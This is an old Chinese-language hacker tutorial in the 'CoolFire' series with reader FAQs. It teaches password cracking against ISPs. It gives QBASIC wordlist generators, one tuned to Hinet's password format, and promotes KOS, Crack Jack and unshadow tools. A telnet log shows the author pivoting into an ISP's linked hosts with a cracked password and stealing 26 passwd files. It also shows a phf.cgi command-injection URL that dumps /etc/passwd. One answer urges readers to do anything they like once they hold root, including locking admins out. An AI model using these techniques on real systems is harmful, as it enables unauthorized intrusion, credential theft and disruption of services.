|
COOLFIRE的经典黑客教程(三)
**** 课程开始 ****
依我看, "字典" 这个讨论应该是谈不完的了, 因为有太多的方法了,
但是为了维护你自身的权益, 自己的密码最好保管好, 我在前几天刚拿到 KOS 的时候, 拿她来跑一个 ISP 的/etc/passwd 档案, 原先单单使用
Crack Jack 只找到 22 组的密码, 用了 KOS 加上 Crack Jack 居然共找到了88 组的密码, 还好该 ISP 不像 高-NET
一样是属於 "时数收费" 的收费方式, 不然可能有许多的User 自己当了冤大头都还浑然不知. 所以这个讨论还是免不了的,
如果你觉得你不需要这些知识,请跳过去吧!!
上次的字典档讨论, 我写了一个简短的程式出来产生了 3120 组的密码,但是这些密码并不一定是一个 "字", 也就是说产生完全合乎我们所限定的 "法则",
但却不一定是一个已存在的字,所以如果要产生一个 "高效率" 的字典档, 使用上次所说的那种方式就不是一个很好的方法了.以上次所写的程式
MAKEDIC.BAS 所产生的 MyDic.txt 为例, 其中的 braard clale cleoe dgeiingdgeie.......等字就不是很
"正常" 的字, 当然也有可能是某人的密码, 但其机率小之又小.
这次所写的程式名称为 TXT2DIC.BAS, 我们还是先使用大家都熟悉的 QBASIC 来写,
以方便日後的修改, 先说明一下原理: 这个程式是一个自动产生字典档的程式, 我们是经由给程式一个"文字档", 然後由程式自该文字档中 "抽取出" 字出来,
这些文字档必需是英文的文字档,如果使用中文的文字档的话程式跑起来会有问题, 英文文字档的取得可由英文版软体的 Readme档或网路上的英文版学术论文或其它的来源.
当然有可能在文件中会出现像 www.showtower.com.tw/~fetag 的字眼,我们总不能把它也列入字典档中吧! 所以程式中有一点小小的设计,
就是该字若字母数大於 10 则不列入考虑,我们也可以使用上一次所介绍的子音+母音... 等的公式来作检查法,
但是我没有太多的时间作这些事,留待有空的人来写吧!!
底下就是该程式原始码, 请各位以 QBASIC 来启动并执行它:
--------------- Txt2Dic.BAS Start Here--------------------
CLS
PRINT "Txt2Dic Version 0.1B (C)1997 By CoolFire ReChange: CoolFire"
PRINT "[Source Released, For Changer, Add Your Name in ReChange Field]"
PRINT
LINE INPUT "Text File Name: "; TxtFile$
LINE INPUT "Output Dic Name: "; DicFile$
OPEN TxtFile$ FOR INPUT AS #1
OPEN "TMPFILE1.$$$" FOR OUTPUT AS #2
REM Filter for text file
ReInput:
IF EOF(1) THEN GOTO EndFile
LINE INPUT #1, L$
ReTry:
L$ = LTRIM$(L$)
L$ = RTRIM$(L$)
Tmpvalue = INSTR(L$, " ")
IF Tmpvalue <> 0 THEN
DicTxt$ = LEFT$(L$, Tmpvalue - 1)
PRINT #2, DicTxt$
LOCATE 7, 1: PRINT "Step 1, Add word : "; DicTxt$; STRING$(10, " ")
L$ = RIGHT$(L$, LEN(L$) - Tmpvalue)
GOTO ReTry
ELSE
GOTO ReInput
END IF
END
Endfile:
CLOSE
REM Filter for special chapter and lower-case the word
OPEN "TMPFILE1.$$$" FOR INPUT AS #1
OPEN DicFile$ FOR OUTPUT AS #2
Special$ = "-,.:<>?*()/_" + CHR$(34)
DO
LINE INPUT #1, L$
FOR I = 1 TO 13
SP$ = MID$(Special$, I, 1)
Tmpvalue = INSTR(L$, SP$)
IF Tmpvalue <> 0 THEN
LOCATE 8, 1: PRINT "Remode special word :"; L$; STRING$(10, " ")
L$ = ""
END IF
NEXT I
IF L$ <> "" THEN
L$ = LCASE$(L$)
PRINT #2, L$
END IF
LOOP UNTIL EOF(1)
CLOSE
KILL "TMPFILE1.$$$"
END
--------------- Cut Here, End of Txt2Dic.BAS---------------------
我只花了几分钟写这个程式, 因为时间紧迫 (为了在过年前将此篇送出),所以有些考虑到的地方都没有作修改, 在这里再作些说明:
这个程式的第一个部份为分解字串, 将碰到的 CHR$(20)也就是空白分离出来, 这是分解一句话中字与字最简单的方法,并且会将分解出来的字存在一个暂存档中,
作为第二部分的使用. 第二部分将暂存档读入, 并过滤非正常的字母出现,我只让它过滤了十三种特殊字如: -,.:<>?*()/_" 等,
当然如果你可视需要再作删减的功能.
原本想要再写排序及过滤重覆字的功能, 但是这些功能不是那麽需要,因为在排序方面你可以使用电脑中 DOS 的 SORT 或 Crack Jack 的
JSort, 过滤重覆字也有 CoolFire 的 De-Sort可以使用, 所以就先在这里停住, 有心的读者可以自行修改,
修改完後也请传送一份给我,作为日後教学的参考之用, 或提供网友们分享.
仔细看一看这个程式还是有很多地方没有作修正, 或是没有作 Error Handle 等,但已经给各位原始程式了, 大家就试著修改看看吧! Qbaisc
是一个很简单的语言,只要你试试看就可以把这个程式改得很好了. 用这个程式试了一个文字档,
发现它找到的字都是一些很简单的字,当然跟你所给它的材料有很大的关系, 使用这个程式配合一个很棒的材料档,
应该可以作出一份很棒的字典档,希望大家可以好好的利用它.
-*-*-*-*-*-*-*-*-*-**-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
**** 新工具程式 Global KOS Krack (KOS) ****
记得从上次讲过 Crack Jack 之後好像就没有再讲过 Password Crack 的工具程式了,
当然也跟最近没有甚麽好程式出现有关系, 像前一阵子风行的 Mail Bomb 最近也没有再见到改版,倒是出现了一些写得不怎麽样的 Bomb 程式,
了无新意, 我现在还是在用 KaBoom 3.0, 前几天无聊逛了一下国外的 Crack 站台, 意外的发现了一个叫作 KOS 的东西,
传回来试了一试果然不错,而且里面还包含了一个 3MB 多的字典档, 这对字典档中缺料的读者们肯定会有帮助的.
KOS 是许多工具的集合, 由一些批次档对这些工具作了很棒的整合, 它必须与 Crack Jack一起使用才能运作, 平常我们在处里 Password
Crack 时都需要考虑到第一个字母大写, 加数字,字母大小写转换等等的工作, 都可以由 KOS 一手包办, 你只要取得 KOS, 就可以配合著 Crack
Jack将以前单单使用 Jack 寻找的 /etc/passwd 再翻出来 Crack 看看, 保证你会体会到拥有 KOS的好处.
像前面所说的, 我将以前只找到 22 组密码的 /etc/passwd 重新跑过, KOS居然可以帮助我找出 88组的密码, 足可见 KOS 可以增强
Crack Jack 四倍的 Cracking 能力, 作者宣称 KOS 在NT 上开了DOS 视窗就可以跑, 但是我以 NT 4.0 中文版及
Windows 95 (97 年版) 测试後还是因为Jack 无法在上面运作而停摆, 只好回到纯 DOS 模式下才能够使用, 但是
KOS还是能发挥它强大的功能, 唯一需要的就是一部速度快一点的机器, 当然还有时间也是必需的.
我使用 KOS + Crack Jack 在 Pentium-100 32MB RAM SCSI-II HDD 上跑一个/etc/passwd
档加上我的字典档 (passwd 档案大小为 197K, 字典档大小为 5.1MB),
跑了四天都还没有完全跑完的情况, 就可以知道 KOS 尽了多大的努力在帮我们找出密码, 当然如果你的 /etc/passwd 只有几
K大小可能只消几个小时就可以全部跑完了!! 不过要找出 root 密码, 可能还是要靠点运气才行了....
KOS 的压缩档中还包含了 SHADOW.C 及 UNSHADOW.C 两个解 shadow 的程式, 可在 Unix
主机上编译以取得被 shadow 过的 /etc/passwd, 在这里也顺便提出,网友们不要忘了顺便试试这两支程式.
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
**** CoolFire FAQ ****
[Q1]请问一下你的letmein 2.0何时出来?
[A1]因为最近实在是太忙了, 所以有很多的事情都没有办法依照预定的行程作完,
所以最近也都不敢
再多排订行程,
看看最近首页更新的状况也应该知道我们实在是没有时间多作别的事了, 所以要
先跟期待 LetMeIn 2.0 的人先说生抱歉, 但是我们的 Idea 还是在持续增加中,
所以如果有空
写 LetMeIn 2.0 的时候将会推出很棒的版本, 请再等等吧~~~ 这阵子先过了再说!!
[Q2]请问一下letmein 1.0 的setup keys-要如何设定? 如果用 netterm 要找login name
& passwd
在letmein要怎样设定不断换行, 而不会文字一直加长?
[A2] LetMeIn 1.0 已经有作一份中文的简易说明来补充原先说明档的不足,
所以如果你对该软体有
不清楚的地方请先阅读这个说明档之後再提出问题, NetMeIn 1.0 是在 NetTerm
下作的测试,
所以使用 NetTerm 配合 LetMeIn 应该不会有问题, 请再试试看!
[Q3]请问 "最新之系统安全 mailliast" 要到那里去看? 还是要订阅? 如何订阅呢?
是英文or 中文?
[A3]原本想要在这次首页更新的时候加入一些 Mail List 订阅的连结点,
但是因为时间太匆促所以
没有作, 先跟各位说声抱歉了, 你可在国外的 Hacker 站找到,
或是先订阅下面这一个 List 来
看看, 不过目前这类的 Mail List 都是英文的.
写到: Majordomo@ns2.rutgers.edu
标题: (空白不填)
内容: SUBSCRIBE www-security 你的 E-Mail 信箱
[Q4]为什麽 De-sort 不能用? Key In ..... 为什麽会这样??
C:\Program Files\LetMeIn>de-sort
De-Sort V0.1 (C)1996 By FETAG Software Development Co. R.O.C. TAIWAN.
This program will:
[1] Delete reiteration word from a dictionary file
[2] Write the new file to a temp file
[3] Delete old dictionary file
[4] Rename new dictionary file as old one's file name
Dictionary file name: 1
{Now Start To Check}
Some error found when program processing, Code= 53
De-Sort Author: James Lin E-Mail: fetag@stsvr.showtower.com.tw
FETAG Software Development Co: http://www.showtower.com.tw/~fetag
C:\Program Files\LetMeIn>
[A4]出现 Error Code = 53 代表开档有问题, 你所输入的档名 '1' 这个档案可能不存在,
你
应该检查看看这个档案是否存在於目前目录, 否则就应该给它目录名称, 其它的
Error
Code 可以参考 QuickBasic 或 Basic PDS 的书籍来查出错误发生的原因是甚麽!
[Q5]小弟自从放寒假後,"高-Net"费用 往上狂飙, 急起直追请问你有Crack 过 "高-Net"吗
??
"高 - Net"的防备似乎蛮强的!我是你的忠实读者,你的作品
coolhc-1,coolhc-2,cool-3,
我都有努力钻研学习,但就是弄不到 etc/passwd, 不知是不是我资质太低 ~~#@$%
烦请高
手帮忙弄到 etc/passwd Ps: coolhc-2,and coolhc-3 最後的那句(高-Net 还是除外)
是
说"高-Net"可以或不可以 Crack ,如果不可以就不用帮我Crack 了!
[A5]当然还是有漏洞, 我有稍微试过, 只要是新发现的 Bug,
他们会很快的有人将漏洞补上,
而且该 ISP 有许多的工作人员, 并且采用计时收费的方式, 所以就算你 Crack 了,
也是
将帐目算到别人头上, 有点缺德, 所以不需要 Crack 它, 大家不要申请它这个 ISP
就好
了! 不然还是请你看看系统安全的 Mail List 了解最新的系统安全消息!
比它们快一步进
入系统就可以了! 这个文章还是以教学为目的, 无法给你 ISP 的 /etc/passwd!
[Q6]Hinet 密码 to Dic: 因为 Hinet 的密码格式是 1abcdefg 所以我就依照 coolhc-3
的程
式设计了这个东西! (0aaaaaaa ~ 9zzzzzzz) 希望会有用! 欢迎批评,指教,修改.
----------- HinetPas.BAS Start Here----------------------------
DIM No$(10)
DIM Eng$(26)
DIM LastWord$(26)
DIM a$(26)
DIM b$(26)
DIM c$(26)
DIM d$(26)
DIM e$(26)
DATA "0", "1", "2", "3", "4", "5", "6", "7", "8", "9"
DATA "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n",
"o",
"p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"
DATA "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n",
"o",
"p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"
DATA "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n",
"o",
"p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"
DATA "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n",
"o",
"p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"
DATA "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n",
"o",
"p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"
DATA "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n",
"o",
"p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"
DATA "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n",
"o",
"p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"
FOR I = 1 TO 10
READ No$(I)
PRINT No$(I)
NEXT I
FOR I = 1 TO 26
READ Eng$(I)
NEXT I
FOR I = 1 TO 26
READ LastWord$(I)
NEXT I
FOR I = 1 TO 26
READ a$(I)
NEXT I
FOR I = 1 TO 26
READ b$(I)
NEXT I
FOR I = 1 TO 26
READ c$(I)
NEXT I
FOR I = 1 TO 26
READ d$(I)
NEXT I
FOR I = 1 TO 26
READ e$(I)
NEXT I
OPEN "Hinetpas.txt" FOR OUTPUT AS #1
FOR I = 1 TO 10
FOR J = 1 TO 26
FOR k = 1 TO 26
FOR l = 1 TO 26
FOR m = 1 TO 26
FOR n = 1 TO 26
FOR o = 1 TO 26
FOR p = 1 TO 26
PRINT #1, No$(I) + Eng$(J) + LastWord$(k) + a$(l) + b$(m) +
c$(n) + d$(o) + e$(p)
NEXT p
NEXT o
NEXT n
NEXT m
NEXT l
NEXT k
NEXT J
NEXT I
CLOSE : END
--------- Cut Here, End of HiNetPas.BAS-------------------
[A6]谢谢这位网友, 你的 For... Next 的 Deep 实在太长了,
不得不将格式改变一下才能放进文章中. 也希望有更多人的集思, 写出更多字的字典档!
[Q7]我用pass2dic时没辨法转成文字档ㄟ, 会有错误说(以下的讯息)请问要如何更正...
Some error found when program processing, Code= 75
[A7]试过了, 都没有办法产生这样的 Code, 所以请看看磁碟是否防写, 或参考 BasicPDS的书籍寻找该 Error Code 的解释或说明.
[Q8]请问一下,passwd除了会放在/etc/之下,还有可能会放在哪儿?
[A8]有有可能是 /etc/ 目录中的 passwd.??? 或 shadow 或 shadow.??? 都有可能.
[Q9]我有在你的HOMEPAGE DOWNLOAD CoolHC#1.txt
里面有些步骤不懂如:1.(首先要先连上某一台你已经有帐号的 Telnet 主机.....)? 是不是在刚上HINET时出现拨号视窗下选=3
进入TELNET?还是SELECT=1 进入PPP後用WS-FTP 找寻etc/pass 的档案?
2.(我有在你的
HOMEPAGE DOWNLOAD A letme.. of program 有点像claymore,不够不会使用
Q.他不把所
有的设定都用好後按"START BF"在 DELAY 未结束时,把游标移到要 CRACK 的
PASSWORD
BOX?但是出现了很长的数字也没有 CRACK? 3.(我在一些国外的WAREZ 看过有关HACK
UNIX
的文件里有写都包函一段 "C"语言,是不是能在 TELNET 下输入执行程式就会自动
CHECK
PASSWORD?是不是你在 "COOLHC#1.TXT里有保留一段进入 SYSTEM 的程式?
4.(有时用WS-FTP
下找PASSWORD时,不是隐藏就是没用的档案,是否有方法让隐藏档显示?
5.你有一个AUTOHACK
是不是一种利用拨电话的方式进入主机?(有点像电影中的战争游戏)?
6.像SHADOW.C的档
案要如何组译成执行档?
[A9]好多的问题喔, 我一个一个回答吧! 1.LetMeIn! 是用在 PPP 模式, 不是 Telnet
模式, 你
先连上 PPP 模式後开启 NetTerm 然後开 LetMeIn! 在 LetMeIn! 中作好设定按下
Start键
後再回到 NetTerm 等待自动输入. 2.Telnet 可在你的 Win95 中找到, 只要连上 PPP
模式
就可以使用, 你也可以使用 NetTerm 之类的软体, 不一定要在连线时选 Telnet
模式.
3. LetMeIn! 需要在启动後回到 Telnet 软体才会自动 Crack 4.AutoHack
是自动拨号寻
找有连接数据机的电话号码, 对 InterNet 来说可能没有用出吧! 5.用这一期 CoolHC
所说
的 KOS 中有 Shadow.c 可以试试. 6.用 cc 指令可以编译, 但要看你的 ISP
有没有提供.
[Q10]请问我抓到的一些字典档 .Z 格式, 为何无法用 uncompress 解开,
解开後都是一些乱码
[A10]如果你用 Windows 或是 Win95 的话, 试著安装 WinZip 应该就可以解开了 !!
详细内容: 本次主题: 善用你所得到的任何资讯 (Exm: HOSTS 档)
连接位址: xxx.xxx.xxx.xxx (又马赛克啦)
特别说明: 因为该站台是一个 "很大" 的 网路提供者, 其服务地区遍及全亚,
所以必须要特别以马
赛克来处理, 希望网友们不要介意 (咱们重的是内容嘛!! 又不是..
那个.. 那个).
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
**** 课程开始 ****
首先说明的是, 这个网路提供者的服务项目,包含了拨接及传真还有帮其它业者架设网路等, 也就是说如果我们能够善用他们的系统就可以免费传真罗 ?? 哇哩...
国际传真耶,
这间公司不就亏大了!!!!!
所以马赛克处理是必要的, 不过这次的课程不是说明这个 ISP 够大,而是我们如何利用一组已经破解的密码来入侵其它与其相连的主机, 这点是比较重要的!!
大家可能早就已经知道, 在 Unix 系统中 /etc 目录下的 hosts 档案的作用了,
我们今天就来谈谈, 知道的人跳过去吧!! 如果使用 Windoz 95 的人, 也可以看看在你 95
的系统目录中也有一个这样子的档案, 他是长得像这个样子的: 127.0.0.1 localhost FETAG , 表示 127.0.0.1 为LocalHost
也就是 FETAG 的电脑, 所以我们要找与该 Unix 有 "直接关系" 的主机可以由这个地方找到.
找到这些主机有甚麽用呀 ?? 继然你已经有了一个主机的密码,当然其它的主机也可能会有相同的User 在其它的主机上用同样的帐号,
而且依据经验来说,他们在其它主机上的密码通常都跟你目前所拥有的这一份是一样的, 也就是你可以用同样的一组密码游走於其它的主机!!
以下示范的这个例子就是啦!!
www:/etc$ telnet Superman.com.tw
Trying 222.111.111.111...
Connected to Superman.com.tw.
Escape character is '^]'.
Linux 1.2.8 (Superman.Superman.com.tw) (ttyp0)
(甚麽烂公司, 新版系统的 Bug 少多了, 还不更新~~~)
Superman login: amywang
Password:
(用你所知道的密码进入)
Linux 1.2.8. (POSIX).
You have new mail.
(不要偷看人家的信喔)
Superman:~$ cd /etc
Superman:/etc$ cat hosts
(直接深入今天的主题)
# For loopbacking.
127.0.0.1 localhost
222.111.247.1 router
222.111.247.2 abcdf01.tpfoo.Superman.com.tw abcdf01 f01
222.111.247.3 abcdf02.tpfoo.Superman.com.tw abcdf02 f02
222.111.247.4 abcdf03.tpfoo.Superman.com.tw abcdf03 f03
222.111.247.5 abcdf04.tpfoo.Superman.com.tw abcdf04 f04
207.121.0.15 abcdhk1.planet.com.hk abcdhk1 hk1
222.111.248.2 abcdf11.tcfoo.Superman.com.tw abcdf11 f11
222.111.248.3 abcdf12.tcfoo.Superman.com.tw abcdf12 f12
222.111.248.4 abcdf13.tcfoo.Superman.com.tw abcdf13 f13
222.111.248.131 abcdf21.ksfoo.Superman.com.tw abcdf21 f21
222.111.248.132 abcdf22.ksfoo.Superman.com.tw abcdf22 f22
222.111.248.133 abcdf23.ksfoo.Superman.com.tw abcdf23 f23
222.111.248.134 abcdf24.ksfoo.Superman.com.tw abcdf24 f24
222.111.247.33 abcdf01-s1.Superman.com.tw abcdf01-s1 f01-s1
222.111.247.33 abcdf02-s1.Superman.com.tw abcdf02-s1 f02-s1
222.111.247.34 abcdts2-s2.Superman.com.tw abcdts2-s1 ts2-s1
222.111.247.193 abcdf11-s1.Superman.com.tw abcdf11-s1 f11-s1
222.111.247.193 abcdf12-s1.Superman.com.tw abcdf12-s1 f12-s1
222.111.247.194 abcdts1-s1.Superman.com.tw abcdts1-s1 ts1-s1
222.111.247.73 abcdf21-s1.Superman.com.tw abcdf21-s1 f21-s1
222.111.247.197 abcdf22-s1.Superman.com.tw abcdf22-s1 f22-s1
222.111.247.198 abcdts1-s2.Superman.com.tw abcdts1-s2 ts1-s2
222.111.247.201 abcdus1-s1.Superman.com.tw abcdus1-s1 us1-s1
222.111.247.77 abcdus2-s1.Superman.com.tw abcdus2-s1 us2-s1
222.111.247.78 abcdts1-s3.Superman.com.tw abcdts1-s3 ts1-s3
222.111.247.133 abcdts1-l0.Superman.com.tw abcdts1-l0 ts1-l0
222.111.248.10 abcdts2-l0.Superman.com.tw abcdts2-l0 ts2-l0
#206.222.170.2 abcdus1.Superman.com.tw abcdus1 us1
#206.222.170.3 abcdus2.Superman.com.tw abcdus2 us2
206.222.170.4 abcdus3.Superman.com.tw abcdus3 us3
206.222.170.5 abcdus4.Superman.com.tw abcdus4 us4
206.222.170.7 abcdus1+.Superman.com.tw abcdus1+ us1+ us1
206.222.170.6 abcdus2+.Superman.com.tw abcdus2+ us2+ us2
222.111.247.131 linux01.Superman.com.tw linux01 x01
222.111.247.135 linux03.Superman.com.tw linux03
222.111.247.151 linux04.Superman.com.tw linux04 x04
222.111.247.132 linux02-l0.Superman.com.tw linux02 x02
222.111.111.111 Superman.Superman.com.tw Superman
222.111.27.153 pc3.Superman.com.tw abcdpc3 pc3
222.111.27.152 pc2.Superman.com.tw abcdpc2 pc2
222.111.27.147 brian.Superman.com.tw brian brian
222.111.27.148 linuxpc.Superman.com.tw linuxpc hsliao
220.65.11.1 knet01
203.127.230.243 fooServer.warpdrive.com.sg sgp02
# End of hosts
(我已经尽量在马赛克了!! 如果有没有马赛克完全的地方, 请该网路业者见谅)
(因为是 Telnet LogFile 直接收录的嘛~~ 唉.. 谁叫你的系统这麽脆弱~~)
Superman:/etc$ telnet 220.65.11.1
Trying 210.65.33.2...
Connected to 210.65.33.2.
Escape character is '^]'.
Linux 1.2.8 (snet01) (ttyp2)
knet01 login: amywang
Password:
Linux 1.2.8. (KNET01).
You have new mail.
(进来了! 就是这样啦!!!!!!)
用了这种方法对该主机所连接的各点作测试,
找到了一个可以使用所有主机的帐号及密码档案, 我
用这个帐号抓了 26 台主机的 /etc/passwd, 现在我的机器还在使用 CJack 对这 26
个密码档解码中, 如
果有更进一步的消息, 我们会在下一篇的时候一并讨论,
当然这个方法不仅适用於这间公司, 对其它
的主机也都适用, 这间公司的规模应算不小了, 台湾; 香港; 日本都有分公司的样子,
不过也都.... 呵~
以上就是 hosts 档的妙用了!! 可能在此篇发表之後大家都用 DNS 了, 而不再编辑 hosts
档了~~~ 不过
这个档案也可以锁起来呀~~ 限定只有 root 可以用嘛! 反正一些烂 ISP 不是都这样,
一有安全顾虑就
限定使用者的使用... 老套了啦!! 你还是会有其它的漏洞的... Linux 1.2.8 哈哈~~~
多的是漏洞哩!!!!
就算你把 hosts 也锁起来, passwd 也 shadow..
还是有一大堆的地方是欢迎大家进入的~~~
嗯.. 没有挑衅的意思啦~~ 各位亲爱的网路提供者... 请将您的系统加锁,
以免有任何不测. 上次我们说
的那个 ISP (WWW Server 有漏洞的那个), 这次已经将 root 的密码改掉了,
但是还是留下许多 User 的
密码没有改, Password 档也没有作任何的保护, 对於这样的业者, 哪一家公司的 Home
Page 敢放在上面
呢 ?? 被人乱改一通不是破坏了公司的形像吗 ??
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
**** 又是字典档 ****
这次字典档的部份不再多谈了, 讲讲上一次的一点漏失,
由於上次写出来的程式太多地方没有先作
考虑, 所以用起来怪怪的 !! 再加上很多的功能没有加上的关系,
有很多网友反映出来的问题多在自
己操作上的错误, 呵~~ 怪写程式的人没有作好一些检查的动作嘛~~
所以 CoolFire 决定将上次那个鸟程式重新写过, 配合排序及检查重覆的功能来使用,
预计由今天晚
上开始动工写出字典档的产生器, 这样才对各位网友们有个交待, 喝呵...
不过网友们别抱著太大的
希望, 因为 James 的 LetMeIn! 2.0 也还在大家的期盼下久久未见,
每天加班的他也实在没甚麽时间,
CoolFire 能在甚麽时候写好, 也是未知数. 不过请各位 Mail
给我你对此字典档产生器的意见, 还有
你希望它能在甚麽作业系统下动作 ?? DOS ?? Windoz ??
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
**** 首页更新通知 ****
上一次的通知有点早, 因为只改了小部份, 日後将不对小部份的更动作任何的通知,
仅对大更动通知,
不过还是请各位有空的时候上来多看看, 以免你在努力的时候别人已经看过了所有的 Hole
List 也将
漏洞补上了! 努力是会有成果的!!
CoolFire 想在板上放个 Crack 心得留言板 ! 有没有人有意见的 ??? 留信给我~
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
**** CoolFire FAQ ****
实在很想帮大家解决问题, 但是请不要寄来 "请帮我 Crack xxx ISP" 的信件,
如果我们的 Home Page 有
甚麽问题, 或是你在 Crack 所遭遇到的问题, 欢迎大家来信讨论!! Harlem Liang
网友所建议的 StarKrack
也是一个不错的 Password Crack 软体, 请大家也帮忙试试喔~~~~
[Q1]你在 Coolhc~4 中讲到 Shadow.c 可以用 unix 里的 cc 指令 但如何 Keyin 例如:
ms.hinet.net/harlem/>CC
之後呢?
[A1]在 Unix 系统中下以下的指令: cc -o deshadow shadow.c 最後所产生出来的
deshadow 就是执行档名了
Unix 是一个不错的系统, 尤其是想要学习 Crack Password
或入侵的中H都一定踯n经过这个门槛, 大
家可以多看看一些有关 Unix 的书籍, 当然 c 语言也是其必须的罗~~~:)
[Q2]deshadow 是在 Unix 下执行,还是在Dos下执行, 用 C 语言可不可以转换?
可不可以把shadow
的 passwd拿回来再转换?
[A2]呵~~ 既然 /etc/passwd 已经 shadow 了! 你拿回来的当然是没有用的密码档,
只能知道其 user 的名字
而已, 所以如果要拿回来 Crack 当然是不可能的, 而 DeShadow 是针对 Unix
系统的漏洞所设计的,
且只能在 Unix 上尝试 DeShadow.. 故请在 Unix 上 Compiler 再执行,
当然有些系统可能已经将漏洞
补上了, 或因为网路安全的问题不提供使用者编译档案,
那就只好使用其它方法罗~~~:)
[Q3]我找到root的密码了! 用kOS的字典档XXXX的etc/passwd 用Star Cracker,
只花了1小时30分 就找到了!
找到root的密码可以做甚麽呢? 你有没有用kOS crack XXXX的 passwd
花了多久time?
[A3]哇 !! 恭喜你罗!(注: XXXX 部份为 "马赛克" ) 找到 root 的密码後能作甚麽 ???
呵.. 随便你罗, 想要
作甚麽就作甚麽, 当然可以更进一步的得到更多的东西,
你可以任意修改系统(小心触法), 也可以
在心情不好的时候把系统 "关" 起来, 不让别人上线, 亦可以更改 root 的密码,
让他们的 root 没有办
法维护系统, 反正系统是你的了! 问我能作甚麽 ?? 我也不能回答你.....
我当然也 Crack 过, 不过
时间嘛... 没算, 因为我都是用好几台电脑在跑的 (利用下班时间),
所以操作环境跟你不同罗!!
[Q4]看hopenet知道linux的bin/login中有一个很大漏洞可以取得root
的权限是怎麽一回事呢?
[A4]该文章附有一 URL 位址, 请连上去看看後就知道了, 现在也有许多人讨论这些东西,
不过很多公司
用的 Linux 都还是 1.x.x 版的, 很好 Crack... 试试吧! 保证你会爱上它~~ 呵~
[Q5]Cyberspace是什麽样的组织?
[A5]嗯 ?? 连这种问题都有人问呀~~~ 请到 www.cyberspace.org 看看就知道罗~~~
[Q6] I have a question for the 'GZ' file FORMat.
[A6]对呀!! 放了字典档的连结在首页上就出现了很多问 .z .gz 档要怎麽解的问题了,
我的系统
安装了 Winzip, Pkunzip, Gzip 後 .z .gz 就变成 Winzip 可解的档案了,
知道该怎麽办了吧~~
[Q7]我日前从你的站台连至GlobalKOS下传jack14的辅助工具,
不过我的连线速度太慢,所以一直
抓不回来,你可以 mirror 回来吗?
[A7]这种问题我也只好 Say "SORRY" 罗, 我们的首页上已经放了很多东西了,
而且也都是开放让
同好们 "免费" 参观及抓取 (绝不收费啦!!), 且一个 kOS 就要 1.xxMB 那麽大,
我基於要放更
多东西的关系提供了一个 Hot Link 在上面, 请各位 "努力" 吧!!
不然换条线试试, 你用的可能
是学术网路吧!! 可不可以在非巅锋时间抓呢?? 还是弄个 ftp Server 帮你抓,
信箱够大的话可
以用 Mail FTP... 等, 都可以达到你的目地的~~~:)
[Q8]我去找到了一个站的密码档,之後我执行JACK却出现 Virtual mode not supported
without VCPI
的讯息,请问是什麽错误?
[A8]这位网友可能是使用 Windoz 95 的 DOS BOX 所出现的讯息吧!! VCPI 要在
EMM386.EXE 挂
上後有效, 也就是说最好在纯 DOS 下挂上 EMM386.EXE 再使用 Crack Jack,
另外使用的时候
也不要在 EMM386.EXE 後下 NOEMS 的参数, 不然 CJack 也不会理你, 至於怎麽在
Win95 的
DOS BOX 中使用 CJack ?? 我也不知道! 有没有人试成功的, 请出个声吧!!
[Q9]我如果由www得到密码档,破解之後我要从那输入密码?
[A9]嗯, 很简单呀!! 启动你的 Telnet 软体 (NetTerm... Telnet... etc.) 连线到
www.xxx.xxx.xxx 去, 然
後就可以输入密码, 依正常程序 Login 就成了!! 加油喔~~ Enjoy Hacking~:)
[Q10]我无法将字典档抓下来, 可否用E-MAIL寄给我
[A10]........ 谁来帮我回答~~~~?
文章名称:如何破解系统(6)
信息来源:《黑客防线》 作者:不详
发表日期:2001年08月15日
调试环境:
详细内容:
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
[CGI Hole (phf.cgi) 的延伸]
这次的主题想了好久, 一直都没有想到, 不过日前有一个屋漏偏逢连夜雨的某国营事业, 在几经下X雨
及漏X的风波之後, 在他们的主机上发现了很好玩的状况, 原本我们在使用 phf.cgi 来抓 /etc/passwd
的时候, 在 Browser 的 Location 中是下:
http://www.somewhere.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Query Results
/usr/local/bin/ph -m alias=x /bin/cat /etc/passwd
root:x:0:1:0000-Admin(0000):/:/sbin/sh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nadm:x:45:2::/usr/bin:/sbin/sh
